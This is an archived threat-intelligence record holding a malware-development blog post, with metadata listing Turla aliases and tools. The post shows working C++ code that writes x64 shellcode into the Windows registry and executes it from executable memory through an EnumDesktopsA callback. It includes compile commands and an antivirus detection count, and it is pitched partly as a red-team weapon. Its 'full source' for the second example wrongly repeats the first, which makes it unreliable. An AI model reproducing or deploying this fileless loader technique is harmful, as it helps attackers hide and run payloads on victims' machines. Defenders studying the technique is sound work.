{
	"id": "2ae9e0b9-613b-43a2-ae0b-a5c663856772",
	"created_at": "2026-04-06T00:09:22.869421Z",
	"updated_at": "2026-04-10T13:12:31.814403Z",
	"deleted_at": null,
	"sha1_hash": "d0de7530c11901c21ae200bb35d8c703df46a313",
	"title": "Malware development trick - part 29: Store binary data in registry. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2069494,
	"plain_text": "Malware development trick - part 29: Store binary data in registry.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2023-05-22 · Archived: 2026-04-05 21:17:10 UTC\r\n7 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nToday, I just want to focus my research on another malware development trick: storing binary data in the Windows Registry. It is a common technique used by malware for persistence and also for storing malicious payloads.\r\npractical example 1\r\nBelow is a simple example of storing binary data in the registry:\r\nvoid registryStore() {\r\n HKEY hkey;\r\n BYTE data[] = {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77};\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, KEY_WRITE, \u0026hkey);\r\n printf (res != ERROR_SUCCESS ? \"failed open registry key :(\\n\" : \"successfully open registry key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nThis code will write the binary data {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77} to HKEY_CURRENT_USER\\Software\\meowApp\\secretMeow. As you can see, you need to create the Software\\meowApp key before storing. 
Please ensure that you have appropriate permissions to write to the registry.\r\nOk, then how can I retrieve this binary data from the registry?\r\nIt’s a simple task:\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n BYTE *data = new BYTE[size];\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, data, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n printf(\"data:\\n\");\r\n for (int i = 0; i \u003c size; i++) {\r\n printf(\"\\\\x%02x\", static_cast\u003cint\u003e(data[i]));\r\n }\r\n printf(\"\\n\\n\");\r\n RegCloseKey(hkey);\r\n delete[] data;\r\n}\r\nThe data is read into a dynamic array, which is then printed to the console just to check correctness. It is important to call delete[] on the data array after you are finished with it to avoid a memory leak.\r\nSo, the full source code looks like this:\r\n/*\r\n * hack.cpp - store binary data in registry. 
C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003ciostream\u003e\r\nvoid registryStore() {\r\n HKEY hkey;\r\n BYTE data[] = {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77};\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, KEY_WRITE, \u0026hkey);\r\n printf (res != ERROR_SUCCESS ? \"failed open registry key :(\\n\" : \"successfully open registry key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n BYTE *data = new BYTE[size];\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, data, \u0026size);\r\n printf(res != ERROR_SUCCESS ? 
\"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n printf(\"data:\\n\");\r\n for (int i = 0; i \u003c size; i++) {\r\n printf(\"\\\\x%02x\", static_cast\u003cint\u003e(data[i]));\r\n }\r\n printf(\"\\n\\n\");\r\n RegCloseKey(hkey);\r\n delete[] data;\r\n}\r\nint main(void) {\r\n registryStore();\r\n registryGetData();\r\n return 0;\r\n}\r\nNote that it’s just a dirty PoC.\r\ndemo 1\r\nLet’s see everything in action.\r\nFirst of all, compile our “malware” on the attacker’s machine:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, just run powershell as Administrator and execute our binary on the victim’s machine (Windows 10 22H2 x64):\r\n.\\hack.exe\r\nAs you can see, everything worked perfectly! =^..^=\r\npractical example 2\r\nWhat about storing a payload in the registry? Let’s check it in practice.\r\nJust modify our functions from hack.cpp:\r\nvoid registryStore() {\r\n HKEY hkey;\r\n const unsigned char data[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n 
\"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? 
\"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nAs usual, I used the meow-meow messagebox payload:\r\nconst unsigned char data[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n 
\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nThen, retrieve the shellcode and execute it via EnumDesktopsA:\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n LPVOID data = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, static_cast\u003cLPBYTE\u003e(data), \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)data, (LPARAM)NULL);\r\n // clean up\r\n VirtualFree(data, 0, MEM_RELEASE);\r\n RegCloseKey(hkey);\r\n}\r\nSo, the full source code for our second example is:\r\n/*\r\n * hack.cpp - store binary data in registry. C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003ciostream\u003e\r\nvoid registryStore() {\r\n HKEY hkey;\r\n BYTE data[] = {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77};\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? 
\"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, KEY_WRITE, \u0026hkey);\r\n printf (res != ERROR_SUCCESS ? \"failed open registry key :(\\n\" : \"successfully open registry key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n BYTE *data = new BYTE[size];\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, data, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n printf(\"data:\\n\");\r\n for (int i = 0; i \u003c size; i++) {\r\n printf(\"\\\\x%02x\", static_cast\u003cint\u003e(data[i]));\r\n }\r\n printf(\"\\n\\n\");\r\n RegCloseKey(hkey);\r\n delete[] data;\r\n}\r\nint main(void) {\r\n registryStore();\r\n registryGetData();\r\n return 0;\r\n}\r\ndemo 2\r\nLet’s see this logic in action. 
First of all, compile hack2.cpp:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, just run powershell as Administrator and execute our binary on the victim’s machine (Windows 10 22H2 x64):\r\n.\\hack2.exe\r\nAs you can see, everything worked as expected! =^..^=\r\nThis method of executing code is often used by malicious software (for example ComRAT, PillowMint and PipeMon) and APT groups (Turla), so it’s likely to be flagged by antivirus software, and may not work on systems with certain security measures in place.\r\nLet’s upload it to VirusTotal:\r\nhttps://www.virustotal.com/gui/file/fe7e412aef1af9dee801224567151f7eaa17ffdbc8c1e97202b4faccb53100e8/details\r\nSo, 16 of 70 AV engines detect our file as malicious.\r\nI hope this post spreads awareness among blue teamers of this interesting malware dev technique, and adds a weapon to the red teamers’ arsenal.\r\nRegCreateKeyEx\r\nRegOpenKeyEx\r\nRegSetValueEx\r\nEnumDesktopsA\r\nMITRE ATT\u0026CK: Fileless Storage\r\nComRAT\r\nPillowMint\r\nPipeMon\r\nTurla\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html"
	],
	"report_names": [
		"malware-tricks-29.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434162,
	"ts_updated_at": 1775826751,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d0de7530c11901c21ae200bb35d8c703df46a313.pdf",
		"text": "https://archive.orkl.eu/d0de7530c11901c21ae200bb35d8c703df46a313.txt",
		"img": "https://archive.orkl.eu/d0de7530c11901c21ae200bb35d8c703df46a313.jpg"
	}
}